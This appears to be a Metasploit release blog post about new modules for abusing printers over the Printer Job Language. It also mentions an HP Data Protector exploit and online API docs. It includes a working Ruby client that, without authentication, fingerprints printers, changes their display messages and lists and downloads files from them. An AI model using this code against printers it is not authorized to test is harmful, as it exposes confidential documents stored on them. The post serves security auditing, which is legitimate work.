Abusing Printers with PJL

This week's release features a half dozen new modules that seek out printers that talk the Printer Job Language (PJL), for use and abuse. Huge thanks to our newest full-time Metasploit troublemaker, William Vu.

As a penetration tester, you probably already know that office printers make tasty targets. Like most hardware with embedded systems, they rarely, if ever, get patched. They seldom have serious security controls. They usually sit in network segments full of end-user desktops, but sometimes they just pop up wherever someone felt the need for a printer, so they're often uncontrolled and unaccounted for by IT administrators.

Finally, and most importantly, printers are often unintentional repositories of sensitive data. The printer_download_file module, in particular, can snag all sorts of proof-of-insecurity artifacts: copies of outbound faxes, signature samples, confidential contract language... all sorts of stuff. A payroll printer is (hopefully!) not going to be PJL-aware, but the community printer/fax that all the sales guys use for quotes and fielding POs? Better start scanning your office floor.

Of course, techniques for abusing the total lack of authentication around PJL have been around for a million years. I don't know of any university lab that hasn't had a printer's LCD display changed to something funny. The story here is that these PJL modules (and the associated Rex protocol code) mean that pentesters and IT security admins alike can more thoroughly, systematically, and routinely audit their sites for printer-based risk exposure. Hopefully, publishing these modules will raise visibility to the point where folks take this kind of thing seriously and stop relegating the risk to "party trick" levels.
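To make the "no authentication" point concrete, here is a small Ruby PJL client written for this post as an added illustration. It is not the new modules' code and not the Rex protocol code they use; it assumes the usual raw-print TCP port 9100 and the statement syntax from HP's PJL Technical Reference, and the module name (PjlClient) and the two sample responses embedded in it are constructed for the example rather than captured from a real device. It builds the statements the modules rely on (INFO ID to fingerprint, RDYMSG to change the display, FSDIRLIST and FSUPLOAD to list and pull files) and parses the replies, so it runs offline against the samples and, given a host argument, against a printer you are authorized to test.

```ruby
require 'socket'

# Added example (not the Metasploit modules' or Rex code): a minimal PJL
# client showing how little stands between a TCP client and the printer's
# display and file system. Assumes raw-print port 9100 and the statement
# syntax from HP's PJL Technical Reference; not validated against any
# particular printer model.
module PjlClient
  UEL  = "\e%-12345X".freeze   # Universal Exit Language: switches the printer into PJL
  PORT = 9100

  # Wrap PJL statements in UEL so they are parsed as PJL regardless of which
  # language (PCL, PostScript, ...) the printer was last speaking.
  def self.job(*statements)
    UEL + "@PJL\r\n" + statements.map { |s| "#{s}\r\n" }.join + UEL
  end

  # Identify the device; a reply that starts with @PJL means it talks PJL.
  def self.info_id
    job('@PJL INFO ID')
  end

  # The classic party trick: rewrite the front-panel message.
  def self.display(msg)
    job(%(@PJL RDYMSG DISPLAY="#{msg.delete('"')}"))  # a quote would end the string early
  end

  # List a volume or directory on the printer's file system.
  def self.dirlist(path, count = 65_535)
    job(%(@PJL FSDIRLIST NAME="#{path}" ENTRY=1 COUNT=#{count}))
  end

  # Pull a file off the printer. PJL calls this an "upload" because the data
  # flows printer -> host; it is the direction printer_download_file works in.
  def self.upload(path, size, offset = 0)
    job(%(@PJL FSUPLOAD NAME="#{path}" OFFSET=#{offset} SIZE=#{size}))
  end

  # Replies echo the statement on the first line, then the payload, then a
  # form feed.
  def self.parse_response(raw)
    header, body = raw.split("\r\n", 2)
    { command: header.to_s.sub(/\A@PJL\s*/, ''), body: body.to_s.sub(/\f\z/, '') }
  end

  def self.pjl_aware?(raw)
    raw.start_with?('@PJL')
  end

  # INFO ID returns the model string, quoted, on its own line.
  def self.model_name(raw)
    parse_response(raw)[:body].strip.delete('"')
  end

  # FSDIRLIST entries look like `name TYPE=DIR` or `name TYPE=FILE SIZE=n`.
  def self.parse_dirlist(raw)
    parse_response(raw)[:body].each_line.map do |line|
      name, attrs = line.chomp.split(' TYPE=', 2)
      next unless attrs
      type, rest = attrs.split(' ', 2)
      { name: name, type: type, size: rest && rest[/SIZE=(\d+)/, 1]&.to_i }
    end.compact
  end

  # Send one job and collect the reply up to the terminating form feed, or
  # until the printer goes quiet (not every response is terminated).
  def self.transact(host, payload, timeout: 5)
    sock = TCPSocket.new(host, PORT)
    sock.binmode
    sock.write(payload)
    reply = String.new
    while IO.select([sock], nil, nil, timeout)
      chunk = sock.read_nonblock(4096, exception: false)
      break unless chunk.is_a?(String)   # nil = EOF, :wait_readable = spurious wakeup
      reply << chunk
      break if reply.end_with?("\f")
    end
    reply
  ensure
    sock&.close
  end

  # Constructed sample replies (not captured from a real device) so the
  # parsers can be exercised offline.
  SAMPLE_ID = "@PJL INFO ID\r\n\"HP LaserJet 4250\"\r\n\f".freeze
  SAMPLE_DIRLIST = ([
    '@PJL FSDIRLIST NAME="0:\" ENTRY=1',
    '. TYPE=DIR', '.. TYPE=DIR', 'webServer TYPE=DIR',
    'quote.pdf TYPE=FILE SIZE=53210'
  ].join("\r\n") + "\r\n\f").freeze
end

if __FILE__ == $PROGRAM_NAME
  if (host = ARGV[0])
    reply = PjlClient.transact(host, PjlClient.info_id)
    puts PjlClient.pjl_aware?(reply) ? "PJL device: #{PjlClient.model_name(reply)}" : 'no PJL reply'
  else
    puts PjlClient.model_name(PjlClient::SAMPLE_ID)
    PjlClient.parse_dirlist(PjlClient::SAMPLE_DIRLIST).each { |entry| p entry }
  end
end
```

Nothing in the exchange asks who you are: the same three-line job that changes the display will, with a different verb, hand back a directory listing and then the files in it, which is exactly why a scan for port 9100 devices that answer INFO ID belongs in a routine audit.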

Metasploit API Docs Online

If you've been watching the development news around Metasploit for the last year or so, you will no doubt have read that we are aggressively pursuing reasonable in-line documentation around core Metasploit functionality. As a quick update on that, you will be pleased to see that https://dev.metasploit.com/api/ is no longer a pack of outdated lies. What you see there is exactly what you'd get on a recent clone of the Metasploit code repository after typing "rake yard" to generate the docs locally.

Hopefully, the increased visibility gained by dumping these autogenerated docs out to the Internet will save new Metasploit exploit devs the trouble of re-implementing common Metasploit conventions over and over again. For example, just browsing the Wordpress class definition reveals which methods our friend Christian @_FireFart_ Mehlmauer has already written for your WordPress exploitation needs. Super useful.

Browsing through the internal Metasploit docs will almost certainly lead to some "Ah-ha!" moments, when you notice a pre-defined method you've never seen used before. I forget tons of things about what makes Metasploit go, and I know I'm not alone. On top of that, YARD-generated docs are just so darn pleasant to read and navigate through.

New Modules

Aside from the PJL modules, we've got a new exploit for HP Data Protector Backup Client, thanks to Juan Vazquez's tireless pursuit of teasing exploit code out of ZDI disclosures.

Exploit modules

HP Data Protector Backup Client Service Directory Traversal by juan vazquez and Brian Gorenc exploits ZDI-14-003

Auxiliary and post modules

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.